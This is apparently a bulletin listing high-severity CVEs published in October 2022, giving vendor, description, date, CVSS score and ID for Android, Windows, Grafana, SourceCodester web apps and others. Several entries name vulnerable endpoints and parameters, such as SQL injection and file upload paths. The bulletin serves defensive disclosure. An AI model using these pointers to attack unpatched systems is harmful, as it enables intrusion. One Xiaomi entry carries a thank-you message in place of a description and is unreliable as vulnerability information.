google — android	There is an missing authorization issue in the system service. Since the component does not have permission check , resulting in Local Elevation of privilege.Product: AndroidVersions: Android SoCAndroid ID: A-242221901	2022-10-11	7.8	CVE-2022-20433 MISC
google — android	There is an missing authorization issue in the system service. Since the component does not have permission check , resulting in Local Elevation of privilege.Product: AndroidVersions: Android SoCAndroid ID: A-242244028	2022-10-11	7.8	CVE-2022-20434 MISC
google — android	There is a Unauthorized service in the system service, may cause the system reboot. Since the component does not have permission check and permission protection, resulting in EoP problem.Product: AndroidVersions: Android SoCAndroid ID: A-242248367	2022-10-11	7.8	CVE-2022-20435 MISC
google — android	There is an unauthorized service in the system service. Since the component does not have permission check, resulting in Local Elevation of privilege.Product: AndroidVersions: Android SoCAndroid ID: A-242248369	2022-10-11	7.8	CVE-2022-20436 MISC
google — android	In telephony, there is a possible escalation of privilege due to a parcel format mismatch. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07319121; Issue ID: ALPS07319121.	2022-10-07	7.8	CVE-2022-26471 MISC
google — android	In ims, there is a possible escalation of privilege due to a parcel format mismatch. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07319095; Issue ID: ALPS07319095.	2022-10-07	7.8	CVE-2022-26472 MISC
google — android	A heap-based overflow vulnerability in makeContactAGIF in libagifencoder.quram.so library prior to SMR Oct-2022 Release 1 allows attacker to perform code execution.	2022-10-07	7.8	CVE-2022-39852 MISC
google — android	A use after free vulnerability in perf-mgr driver prior to SMR Oct-2022 Release 1 allows attacker to cause memory access fault.	2022-10-07	7.8	CVE-2022-39853 MISC
google — android	In avrc_ctrl_pars_vendor_rsp of avrc_pars_ct.cc, there is a possible out of bounds read due to an integer overflow. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12 Android-12L Android-13Android ID: A-205570663	2022-10-11	7.5	CVE-2022-20410 MISC
google — android	In pickStartSeq of AAVCAssembler.cpp, there is a possible out of bounds read due to a missing bounds check. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12 Android-12L Android-13Android ID: A-231986464	2022-10-11	7.5	CVE-2022-20418 MISC
google — android	In Wi-Fi driver, there is a possible way to disconnect Wi-Fi due to an improper resource release. This could lead to remote denial of service with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07030600; Issue ID: ALPS07030600.	2022-10-07	7.5	CVE-2022-32589 MISC
google — android	In ril, there is a possible system crash due to an incorrect bounds check. This could lead to remote denial of service with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07257259; Issue ID: ALPS07257259.	2022-10-07	7.5	CVE-2022-32591 MISC
google — android	In dllist_remove_node of TBD, there is a possible use after free bug due to a race condition. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android SoCAndroid ID: A-242344778	2022-10-11	7	CVE-2021-0696 MISC
google — android	In emulation_proc_handler of armv8_deprecated.c, there is a possible way to corrupt memory due to a race condition. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-237540956References: Upstream kernel	2022-10-11	7	CVE-2022-20422 MISC
google — protobuf-java	A parsing issue with binary data in protobuf-java core and lite versions prior to 3.21.7, 3.20.3, 3.19.6 and 3.16.3 can lead to a denial of service attack. Inputs containing multiple instances of non-repeated embedded messages with repeated or unknown fields causes objects to be converted back-n-forth between mutable and immutable forms, resulting in potentially long garbage collection pauses. We recommend updating to the versions mentioned above.	2022-10-12	7.5	CVE-2022-3171 CONFIRM
gradle — enterprise	An access-control vulnerability in Gradle Enterprise 2022.4 through 2022.3.1 allows remote attackers to prevent backups from occurring, and send emails with arbitrary text content to the configured installation-administrator contact address, via HTTP access to an accidentally exposed internal endpoint. This is fixed in 2022.3.2.	2022-10-07	7.5	CVE-2022-41574 MISC MISC
grafana — grafana	Grafana is an open source observability and data visualization platform. Versions prior to 9.1.8 and 8.5.14 are vulnerable to a bypass in the plugin signature verification. An attacker can convince a server admin to download and successfully run a malicious plugin even though unsigned plugins are not allowed. Versions 9.1.8 and 8.5.14 contain a patch for this issue. As a workaround, do not install plugins downloaded from untrusted sources.	2022-10-13	7.8	CVE-2022-31123 CONFIRM MISC
grafana — grafana	Grafana is an open source observability and data visualization platform. Versions of Grafana for endpoints prior to 9.1.8 and 8.5.14 could leak authentication tokens to some destination plugins under some conditions. The vulnerability impacts data source and plugin proxy endpoints with authentication tokens. The destination plugin could receive a user’s Grafana authentication token. Versions 9.1.8 and 8.5.14 contain a patch for this issue. As a workaround, do not use API keys, JWT authentication, or any HTTP Header based authentication.	2022-10-13	7.5	CVE-2022-31130 CONFIRM MISC MISC MISC
grunt-karma_project — grunt-karma	Prototype pollution vulnerability in karma-runner grunt-karma 4.0.1 via the key variable in grunt-karma.js.	2022-10-14	9.8	CVE-2022-37602 MISC MISC MISC
hancom — hancom_office_2020	A buffer underflow vulnerability exists in the way Hword of Hancom Office 2020 version 11.0.0.5357 parses XML-based office files. A specially-crafted malformed file can cause memory corruption by using memory before buffer start, which can lead to code execution. A victim would need to access a malicious file to trigger this vulnerability.	2022-10-07	7.8	CVE-2022-33896 MISC
hashicorp — packer	An issue was discovered in Hashicorp Packer before 2.3.1. The recommended sudoers configuration for Vagrant on Linux is insecure. If the host has been configured according to this documentation, non-privileged users on the host can leverage a wildcard in the sudoers configuration to execute arbitrary commands as root.	2022-10-11	7.8	CVE-2022-42717 MISC MISC MISC
huawei — harmonyos	The rphone module has a script that can be maliciously modified.Successful exploitation of this vulnerability may cause irreversible programs to be implanted on user devices.	2022-10-14	7.8	CVE-2022-41576 MISC MISC
huawei — harmonyos	The kernel server has a vulnerability of not verifying the length of the data transferred in the user space.Successful exploitation of this vulnerability may cause out-of-bounds read in the kernel, which affects the device confidentiality and availability.	2022-10-14	7.1	CVE-2022-41577 MISC MISC
human_resource_management_system_project — human_resource_management_system	A vulnerability has been found in SourceCodester Human Resource Management System 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /employeeview.php of the component Image File Handler. The manipulation leads to unrestricted upload. The attack can be launched remotely. The associated identifier of this vulnerability is VDB-210559.	2022-10-12	9.8	CVE-2022-3458 N/A
human_resource_management_system_project — human_resource_management_system	A vulnerability classified as critical was found in SourceCodester Human Resource Management System 1.0. This vulnerability affects unknown code of the component Profile Photo Handler. The manipulation of the argument parameter leads to os command injection. The attack can be initiated remotely. The identifier of this vulnerability is VDB-210772.	2022-10-13	8.8	CVE-2022-3492 MISC
human_resource_management_system_project — human_resource_management_system	A vulnerability was found in SourceCodester Human Resource Management System 1.0 and classified as critical. This issue affects some unknown processing of the file employeeadd.php of the component Admin Panel. The manipulation leads to improper access controls. The attack may be initiated remotely. The identifier VDB-210785 was assigned to this vulnerability.	2022-10-14	8.8	CVE-2022-3496 MISC
idreamsoft — icms	iCMS v7.0.16 was discovered to contain a Server-Side Request Forgery (SSRF) via the url parameter at admincp.php.	2022-10-13	9.8	CVE-2022-41496 MISC
ikuai8 — ikuaios	iKuai8 v3.6.7 was discovered to contain an authenticated remote code execution (RCE) vulnerability.	2022-10-12	8.8	CVE-2022-40469 MISC MISC MISC
ikus-soft — rdiffweb	Allocation of Resources Without Limits or Throttling in GitHub repository ikus060/rdiffweb prior to 2.5.0.	2022-10-14	9.8	CVE-2022-3439 MISC CONFIRM
ikus-soft — rdiffweb	Allocation of Resources Without Limits or Throttling in GitHub repository ikus060/rdiffweb prior to 2.5.0.	2022-10-13	9.8	CVE-2022-3456 MISC CONFIRM
ikus-soft — rdiffweb	Origin Validation Error in GitHub repository ikus060/rdiffweb prior to 2.5.0a5.	2022-10-13	9.8	CVE-2022-3457 MISC CONFIRM
ini4j_project — ini4j	An issue in the fetch() method in the BasicProfile class of org.ini4j before v0.5.4 allows attackers to cause a Denial of Service (DoS) via unspecified vectors.	2022-10-11	7.5	CVE-2022-41404 MISC
interspire — email_marketer	Interspire Email Marketer through 6.5.0 allows arbitrary file upload via a surveys_submit.php “create survey and submit survey” operation, which can cause a .php file to be accessible under a /admin/temp/surveys/ URI. NOTE: this issue exists because of an incomplete fix for CVE-2018-19550.	2022-10-11	8.8	CVE-2022-40777 MISC MISC
isc — dhcp	In ISC DHCP 4.4.0 -> 4.4.3, ISC DHCP 4.1-ESV-R1 -> 4.1-ESV-R16-P1, when the function option_code_hash_lookup() is called from add_option(), it increases the option’s refcount field. However, there is not a corresponding call to option_dereference() to decrement the refcount field. The function add_option() is only used in server responses to lease query packets. Each lease query response calls this function for several options, so eventually, the reference counters could overflow and cause the server to abort.	2022-10-07	7.5	CVE-2022-2928 CONFIRM MLIST FEDORA
jflyfox — jfinal_cms	JFinal CMS 5.1.0 is vulnerable to SQL Injection. These interfaces do not use the same component, nor do they have filters, but each uses its own SQL concatenation method, resulting in SQL injection.	2022-10-13	8.8	CVE-2022-37208 MISC MISC
jiusi — jiusi_oa	A vulnerability classified as critical was found in Jiusi OA. Affected by this vulnerability is an unknown functionality of the file /jsoa/hntdCustomDesktopActionContent. The manipulation of the argument inforid leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier VDB-210709 was assigned to this vulnerability.	2022-10-12	9.8	CVE-2022-3467 MISC MISC
js-beautify_project — js-beautify	Prototype pollution vulnerability in beautify-web js-beautify 1.13.7 via the name variable in options.js.	2022-10-11	9.8	CVE-2022-37609 MISC MISC MISC
linaro — lava	In Linaro Automated Validation Architecture (LAVA) before 2022.10, there is dynamic code execution in lava_server/lavatable.py. Due to improper input sanitization, an anonymous user can force the lava-server-gunicorn service to execute user-provided code on the server.	2022-10-13	8.8	CVE-2022-42902 MISC MISC
linuxmint — warpinator	Warpinator through 1.2.14 allows access outside of an intended directory, as demonstrated by symbolic directory links.	2022-10-10	7.5	CVE-2022-42725 MISC MISC MISC MISC
mediabridgeproducts — mlwr-ac1200r_firmware	A vulnerability classified as critical was found in Mediabridge Medialink. This vulnerability affects unknown code of the file /index.asp. The manipulation leads to improper authentication. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-210700.	2022-10-12	9.8	CVE-2022-3465 N/A N/A
melistechnology — melis-asset-manager	MelisAssetManager provides deliveries of Melis Platform’s assets located in every module’s public folder. Attackers can read arbitrary files on affected versions of `melisplatform/melis-asset-manager`, leading to the disclosure of sensitive information. Conducting this attack does not require authentication. Users should immediately upgrade to `melisplatform/melis-asset-manager` >= 5.0.1. This issue was addressed by restricting access to files to intended directories only.	2022-10-11	7.5	CVE-2022-39296 CONFIRM MISC
melistechnology — meliscms	MelisCms provides a full CMS for Melis Platform, including templating system, drag’n’drop of plugins, SEO and many administration tools. Attackers can deserialize arbitrary data on affected versions of `melisplatform/melis-cms`, and ultimately leads to the execution of arbitrary PHP code on the system. Conducting this attack does not require authentication. Users should immediately upgrade to `melisplatform/melis-cms` >= 5.0.1. This issue was addressed by restricting allowed classes when deserializing user-controlled data.	2022-10-12	9.8	CVE-2022-39297 MISC CONFIRM
melistechnology — meliscms	MelisFront is the engine that displays website hosted on Melis Platform. It deals with showing pages, plugins, URL rewritting, search optimization and SEO, etc. Attackers can deserialize arbitrary data on affected versions of `melisplatform/melis-front`, and ultimately leads to the execution of arbitrary PHP code on the system. Conducting this attack does not require authentication. Users should immediately upgrade to `melisplatform/melis-front` >= 5.0.1. This issue was addressed by restricting allowed classes when deserializing user-controlled data.	2022-10-12	9.8	CVE-2022-39298 MISC CONFIRM
merchandise_online_store_project — merchandise_online_store	A Vertical Privilege Escalation issue in Merchandise Online Store v.1.0 allows an attacker to get access to the admin dashboard.	2022-10-11	8.8	CVE-2022-42238 MISC
mi — xiaomi	A logic vulnerability exists in a Xiaomi product. The vulnerability is caused by an identity verification failure, which can be exploited by an attacker who can obtain a brief elevation of privilege.	2022-10-11	9.8	CVE-2020-14129 MISC
mi — xiaomi	The Xiaomi Security Center expresses heartfelt thanks to ADLab of VenusTech ! At the same time, we also welcome more outstanding and professional security experts and security teams to join the Mi Security Center (MiSRC) to jointly ensure the safe access of millions of Xiaomi users worldwide Life.	2022-10-11	9.8	CVE-2020-14131 MISC
microsoft — .net_core	NuGet Client Elevation of Privilege Vulnerability.	2022-10-11	7.8	CVE-2022-41032 MISC
microsoft — azure_rtos_usbx	Azure RTOS USBx is a USB host, device, and on-the-go (OTG) embedded stack, fully integrated with Azure RTOS ThreadX and available for all Azure RTOS ThreadX–supported processors. Azure RTOS USBX implementation of host support for USB CDC ECM includes an integer underflow and a buffer overflow in the `_ux_host_class_cdc_ecm_mac_address_get` function which may be potentially exploited to achieve remote code execution or denial of service. Setting mac address string descriptor length to a `0` or `1` allows an attacker to introduce an integer underflow followed (string_length) by a buffer overflow of the `cdc_ecm -> ux_host_class_cdc_ecm_node_id` array. This may allow one to redirect the code execution flow or introduce a denial of service. The fix has been included in USBX release [6.1.12](https://github.com/azure-rtos/usbx/releases/tag/v6.1.12_rel). Improved mac address string descriptor length validation to check for unexpectedly small values may be used as a workaround.	2022-10-10	9.8	CVE-2022-36063 CONFIRM MISC MISC
microsoft — azure_stack_edge	Azure Arc-enabled Kubernetes cluster Connect Elevation of Privilege Vulnerability.	2022-10-11	10	CVE-2022-37968 MISC
microsoft — jupyter	Visual Studio Code Elevation of Privilege Vulnerability.	2022-10-11	7.8	CVE-2022-41083 MISC
microsoft — malware_protection_engine	Microsoft Windows Defender Elevation of Privilege Vulnerability.	2022-10-11	7.1	CVE-2022-37971 MISC
microsoft — office	Microsoft Office Remote Code Execution Vulnerability.	2022-10-11	7.8	CVE-2022-38048 MISC
microsoft — office	Microsoft Office Graphics Remote Code Execution Vulnerability.	2022-10-11	7.8	CVE-2022-38049 MISC
microsoft — office	Microsoft Word Remote Code Execution Vulnerability.	2022-10-11	7.8	CVE-2022-41031 MISC
microsoft — sharepoint_foundation	Microsoft SharePoint Server Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2022-41036, CVE-2022-41037, CVE-2022-41038.	2022-10-11	8.8	CVE-2022-38053 MISC
microsoft — sharepoint_foundation	Microsoft SharePoint Server Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2022-38053, CVE-2022-41037, CVE-2022-41038.	2022-10-11	8.8	CVE-2022-41036 MISC
microsoft — sharepoint_foundation	Microsoft SharePoint Server Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2022-38053, CVE-2022-41036, CVE-2022-41038.	2022-10-11	8.8	CVE-2022-41037 MISC
microsoft — sharepoint_foundation	Microsoft SharePoint Server Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2022-38053, CVE-2022-41036, CVE-2022-41037.	2022-10-11	8.8	CVE-2022-41038 MISC
microsoft — visual_studio_code	Visual Studio Code Remote Code Execution Vulnerability.	2022-10-11	7.8	CVE-2022-41034 MISC
microsoft — visual_studio_code	Visual Studio Code Information Disclosure Vulnerability.	2022-10-11	7.4	CVE-2022-41042 MISC
microsoft — windows_10	Windows Group Policy Elevation of Privilege Vulnerability.	2022-10-11	8.8	CVE-2022-37975 MISC
microsoft — windows_10	Microsoft WDAC OLE DB provider for SQL Server Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2022-38031.	2022-10-11	8.8	CVE-2022-37982 MISC
microsoft — windows_10	Windows Local Security Authority (LSA) Elevation of Privilege Vulnerability.	2022-10-11	8.8	CVE-2022-38016 MISC
microsoft — windows_10	Windows Local Session Manager (LSM) Denial of Service Vulnerability. This CVE ID is unique from CVE-2022-37998.	2022-10-11	8.6	CVE-2022-37973 MISC
microsoft — windows_10	Windows Point-to-Point Tunneling Protocol Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2022-24504, CVE-2022-30198, CVE-2022-33634, CVE-2022-38000, CVE-2022-38047, CVE-2022-41081.	2022-10-11	8.1	CVE-2022-22035 MISC
microsoft — windows_10	Windows Point-to-Point Tunneling Protocol Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2022-22035, CVE-2022-30198, CVE-2022-33634, CVE-2022-38000, CVE-2022-38047, CVE-2022-41081.	2022-10-11	8.1	CVE-2022-24504 MISC
microsoft — windows_10	Windows Point-to-Point Tunneling Protocol Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2022-22035, CVE-2022-24504, CVE-2022-33634, CVE-2022-38000, CVE-2022-38047, CVE-2022-41081.	2022-10-11	8.1	CVE-2022-30198 MISC
microsoft — windows_10	Windows Point-to-Point Tunneling Protocol Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2022-22035, CVE-2022-24504, CVE-2022-30198, CVE-2022-38000, CVE-2022-38047, CVE-2022-41081.	2022-10-11	8.1	CVE-2022-33634 MISC
microsoft — windows_10	Windows GDI+ Remote Code Execution Vulnerability.	2022-10-11	7.8	CVE-2022-33635 MISC
microsoft — windows_10	Windows Hyper-V Elevation of Privilege Vulnerability.	2022-10-11	7.8	CVE-2022-37979 MISC
microsoft — windows_10	Windows DHCP Client Elevation of Privilege Vulnerability.	2022-10-11	7.8	CVE-2022-37980 MISC
microsoft — windows_10	Windows WLAN Service Elevation of Privilege Vulnerability.	2022-10-11	7.8	CVE-2022-37984 MISC
microsoft — windows_10	Windows Win32k Elevation of Privilege Vulnerability.	2022-10-11	7.8	CVE-2022-37986 MISC
microsoft — windows_10	Windows Kernel Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2022-37988, CVE-2022-37990, CVE-2022-37991, CVE-2022-38022, CVE-2022-38037, CVE-2022-38038, CVE-2022-38039.	2022-10-11	7.8	CVE-2022-37995 MISC
microsoft — windows_10	Windows Resilient File System Elevation of Privilege.	2022-10-11	7.8	CVE-2022-38003 MISC
microsoft — windows_10	Windows Local Session Manager (LSM) Denial of Service Vulnerability. This CVE ID is unique from CVE-2022-37973.	2022-10-11	7.7	CVE-2022-37998 MISC
microsoft — windows_10	Windows TCP/IP Driver Denial of Service Vulnerability.	2022-10-11	7.5	CVE-2022-33645 MISC
microsoft — windows_10	Windows CryptoAPI Spoofing Vulnerability.	2022-10-11	7.5	CVE-2022-34689 MISC
microsoft — windows_10	Windows Active Directory Certificate Services Security Feature Bypass.	2022-10-11	7.5	CVE-2022-37978 MISC
microsoft — windows_server_2008	Active Directory Certificate Services Elevation of Privilege Vulnerability.	2022-10-11	8.8	CVE-2022-37976 MISC
microsoft — windows_server_2008	Microsoft WDAC OLE DB provider for SQL Server Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2022-37982.	2022-10-11	8.8	CVE-2022-38031 MISC
microsoft — windows_server_2008	Windows Workstation Service Elevation of Privilege Vulnerability.	2022-10-11	8.8	CVE-2022-38034 MISC
microsoft — windows_server_2008	Microsoft ODBC Driver Remote Code Execution Vulnerability.	2022-10-11	8.8	CVE-2022-38040 MISC
microsoft — windows_server_2008	Windows Point-to-Point Tunneling Protocol Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2022-22035, CVE-2022-24504, CVE-2022-30198, CVE-2022-33634, CVE-2022-38047, CVE-2022-41081.	2022-10-11	8.1	CVE-2022-38000 MISC
microsoft — windows_server_2008	Active Directory Domain Services Elevation of Privilege Vulnerability.	2022-10-11	8.1	CVE-2022-38042 MISC
microsoft — windows_server_2008	Windows Point-to-Point Tunneling Protocol Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2022-22035, CVE-2022-24504, CVE-2022-30198, CVE-2022-33634, CVE-2022-38000, CVE-2022-41081.	2022-10-11	8.1	CVE-2022-38047 MISC
microsoft — windows_server_2008	Windows Point-to-Point Tunneling Protocol Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2022-22035, CVE-2022-24504, CVE-2022-30198, CVE-2022-33634, CVE-2022-38000, CVE-2022-38047.	2022-10-11	8.1	CVE-2022-41081 MISC
microsoft — windows_server_2008	Windows Client Server Run-time Subsystem (CSRSS) Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2022-37989.	2022-10-11	7.8	CVE-2022-37987 MISC
microsoft — windows_server_2008	Windows Kernel Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2022-37990, CVE-2022-37991, CVE-2022-37995, CVE-2022-38022, CVE-2022-38037, CVE-2022-38038, CVE-2022-38039.	2022-10-11	7.8	CVE-2022-37988 MISC
microsoft — windows_server_2008	Windows Client Server Run-time Subsystem (CSRSS) Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2022-37987.	2022-10-11	7.8	CVE-2022-37989 MISC
microsoft — windows_server_2008	Windows Kernel Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2022-37988, CVE-2022-37991, CVE-2022-37995, CVE-2022-38022, CVE-2022-38037, CVE-2022-38038, CVE-2022-38039.	2022-10-11	7.8	CVE-2022-37990 MISC
microsoft — windows_server_2008	Windows Kernel Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2022-37988, CVE-2022-37990, CVE-2022-37995, CVE-2022-38022, CVE-2022-38037, CVE-2022-38038, CVE-2022-38039.	2022-10-11	7.8	CVE-2022-37991 MISC
microsoft — windows_server_2008	Windows Group Policy Preference Client Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2022-37994, CVE-2022-37999.	2022-10-11	7.8	CVE-2022-37993 MISC
microsoft — windows_server_2008	Windows Group Policy Preference Client Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2022-37993, CVE-2022-37999.	2022-10-11	7.8	CVE-2022-37994 MISC
microsoft — windows_server_2008	Windows Graphics Component Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2022-38051.	2022-10-11	7.8	CVE-2022-37997 MISC
microsoft — windows_server_2008	Windows Group Policy Preference Client Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2022-37993, CVE-2022-37994.	2022-10-11	7.8	CVE-2022-37999 MISC
microsoft — windows_server_2008	Windows Print Spooler Elevation of Privilege Vulnerability.	2022-10-11	7.8	CVE-2022-38028 MISC
microsoft — windows_server_2008	Windows Kernel Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2022-37988, CVE-2022-37990, CVE-2022-37991, CVE-2022-37995, CVE-2022-38022, CVE-2022-38038, CVE-2022-38039.	2022-10-11	7.8	CVE-2022-38037 MISC
microsoft — windows_server_2008	Windows Kernel Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2022-37988, CVE-2022-37990, CVE-2022-37991, CVE-2022-37995, CVE-2022-38022, CVE-2022-38037, CVE-2022-38039.	2022-10-11	7.8	CVE-2022-38038 MISC
microsoft — windows_server_2008	Windows CD-ROM File System Driver Remote Code Execution Vulnerability.	2022-10-11	7.8	CVE-2022-38044 MISC
microsoft — windows_server_2008	Windows Graphics Component Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2022-37997.	2022-10-11	7.8	CVE-2022-38051 MISC
microsoft — windows_server_2008	Windows COM+ Event System Service Elevation of Privilege Vulnerability.	2022-10-11	7.8	CVE-2022-41033 MISC
microsoft — windows_server_2008	Windows Secure Channel Denial of Service Vulnerability.	2022-10-11	7.5	CVE-2022-38041 MISC
microsoft — windows_server_2008	Windows Storage Elevation of Privilege Vulnerability.	2022-10-11	7	CVE-2022-38027 MISC
microsoft — windows_server_2008	Windows ALPC Elevation of Privilege Vulnerability.	2022-10-11	7	CVE-2022-38029 MISC
microsoft — windows_server_2012	Server Service Remote Protocol Elevation of Privilege Vulnerability.	2022-10-11	9.1	CVE-2022-38045 MISC
microsoft — windows_server_2012	Connected User Experiences and Telemetry Elevation of Privilege Vulnerability.	2022-10-11	7	CVE-2022-38021 MISC
microsoft — windows_server_2019	Windows DWM Core Library Elevation of Privilege Vulnerability.	2022-10-11	7.8	CVE-2022-37970 MISC
microsoft — windows_server_2019	Microsoft DWM Core Library Elevation of Privilege Vulnerability.	2022-10-11	7.8	CVE-2022-37983 MISC
microsoft — windows_server_2019	Windows Kernel Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2022-37988, CVE-2022-37990, CVE-2022-37991, CVE-2022-37995, CVE-2022-38022, CVE-2022-38037, CVE-2022-38038.	2022-10-11	7.8	CVE-2022-38039 MISC
microsoft — windows_server_2019	Win32k Elevation of Privilege Vulnerability.	2022-10-11	7.8	CVE-2022-38050 MISC
microsoft — windows_server_2019	Web Account Manager Information Disclosure Vulnerability.	2022-10-11	7.5	CVE-2022-38046 MISC
microsoft — windows_server_2022	Internet Key Exchange (IKE) Protocol Denial of Service Vulnerability.	2022-10-11	7.5	CVE-2022-38036 MISC
mockery_project — mockery	Prototype pollution vulnerability in function enable in mockery.js in mfncooper mockery commit 822f0566fd6d72af8c943ae5ca2aa92e516aa2cf via the key variable in mockery.js.	2022-10-12	9.8	CVE-2022-37614 MISC MISC MISC
newsletter_subscribe_(popup_+_regular_module)_project — newsletter_subscribe_(popup_+_regular_module)	OpenCart 3.x Newsletter Custom Popup was discovered to contain a SQL injection vulnerability via the email parameter at index.php?route=extension/module/so_newletter_custom_popup/newsletter.	2022-10-12	9.8	CVE-2022-41403 MISC
node_saml_project — node_saml	node SAML is a SAML 2.0 library based on the SAML implementation of passport-saml. A remote attacker may be able to bypass SAML authentication on a website using passport-saml. A successful attack requires that the attacker is in possession of an arbitrary IDP signed XML element. Depending on the IDP used, fully unauthenticated attacks (e.g without access to a valid user) might also be feasible if generation of a signed message can be triggered. Users should upgrade to node-saml version 4.0.0-beta5 or newer. Disabling SAML authentication may be done as a workaround.	2022-10-13	8.1	CVE-2022-39300 MISC CONFIRM
nokia — airframe_bmc_web_gui_r18_firmware	Multiple Improper Access Control was discovered in Nokia AirFrame BMC Web GUI < R18 Firmware v4.13.00. It does not properly validate requests for access to (or editing of) data and functionality in all endpoints under /#settings/* and /api/settings/*. By not verifying the permissions for access to resources, it allows a potential attacker to view pages, with sensitive data, that are not allowed, and modify system configurations also causing DoS, which should be accessed only by user with administration profile, bypassing all controls (without checking for user identity).	2022-10-12	8.8	CVE-2022-28866 MISC MISC
ocomon_project — ocomon	OcoMon v4.0 was discovered to contain a SQL injection vulnerability via the cod parameter at download.php.	2022-10-13	9.8	CVE-2022-41390 MISC
ocomon_project — ocomon	OcoMon v4.0 was discovered to contain a SQL injection vulnerability via the cod parameter at showImg.php.	2022-10-13	9.8	CVE-2022-41391 MISC
online_diagnostic_lab_management_system_project — online_diagnostic_lab_management_system	Online Diagnostic Lab Management System version 1.0 remote exploit that bypasses login with SQL injection and then uploads a shell.	2022-10-14	9.8	CVE-2022-42064 MISC
online_diagnostic_lab_management_system_project — online_diagnostic_lab_management_system	Online Diagnostic Lab Management System v1.0 was discovered to contain an arbitrary file upload vulnerability via the component /php_action/editProductImage.php. This vulnerability allows attackers to execute arbitrary code via a crafted PHP file.	2022-10-13	7.2	CVE-2022-41533 MISC
online_diagnostic_lab_management_system_project — online_diagnostic_lab_management_system	Online Diagnostic Lab Management System v1.0 was discovered to contain an arbitrary file upload vulnerability via the component /php_action/createOrder.php. This vulnerability allows attackers to execute arbitrary code via a crafted PHP file.	2022-10-13	7.2	CVE-2022-41534 MISC
online_diagnostic_lab_management_system_project — online_diagnostic_lab_management_system	Online Diagnostic Lab Management System v1.0 is vulnerable to SQL Injection via /diagnostic/editclient.php?id=.	2022-10-07	7.2	CVE-2022-42073 MISC
online_diagnostic_lab_management_system_project — online_diagnostic_lab_management_system	Online Diagnostic Lab Management System v1.0 is vulnerable to SQL Injection via /diagnostic/editcategory.php?id=.	2022-10-07	7.2	CVE-2022-42074 MISC
online_leave_management_system_project — online_leave_management_system	An arbitrary file upload vulnerability in the component /leave_system/classes/Users.php?f=save of Online Leave Management System v1.0 allows attackers to execute arbitrary code via a crafted PHP file.	2022-10-07	7.2	CVE-2022-41379 MISC
online_pet_shop_we_app_project — online_pet_shop_we_app	Online Pet Shop We App v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /admin/?page=orders/view_order.	2022-10-12	9.8	CVE-2022-41408 MISC
online_pet_shop_we_app_project — online_pet_shop_we_app	Online Pet Shop We App v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /pet_shop/admin/?page=maintenance/manage_category.	2022-10-07	7.2	CVE-2022-41377 MISC
online_pet_shop_we_app_project — online_pet_shop_we_app	Online Pet Shop We App v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /pet_shop/admin/?page=inventory/manage_inventory.	2022-10-07	7.2	CVE-2022-41378 MISC
online_pet_shop_we_app_project — online_pet_shop_we_app	Online Pet Shop We App v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /admin/?page=orders/view_order.	2022-10-12	7.2	CVE-2022-41407 MISC
open_source_sacco_management_system_project — open_source_sacco_management_system	Open Source SACCO Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /sacco_shield/ajax.php?action=delete_loan.	2022-10-07	7.2	CVE-2022-41514 MISC
open_source_sacco_management_system_project — open_source_sacco_management_system	Open Source SACCO Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /sacco_shield/ajax.php?action=delete_payment.	2022-10-07	7.2	CVE-2022-41515 MISC
open_source_sacco_management_system_project — open_source_sacco_management_system	Open Source SACCO Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /sacco_shield/ajax.php?action=delete_borrower.	2022-10-12	7.2	CVE-2022-41530 MISC
open_source_sacco_management_system_project — open_source_sacco_management_system	Open Source SACCO Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /sacco_shield/ajax.php?action=delete_plan.	2022-10-12	7.2	CVE-2022-41532 MISC
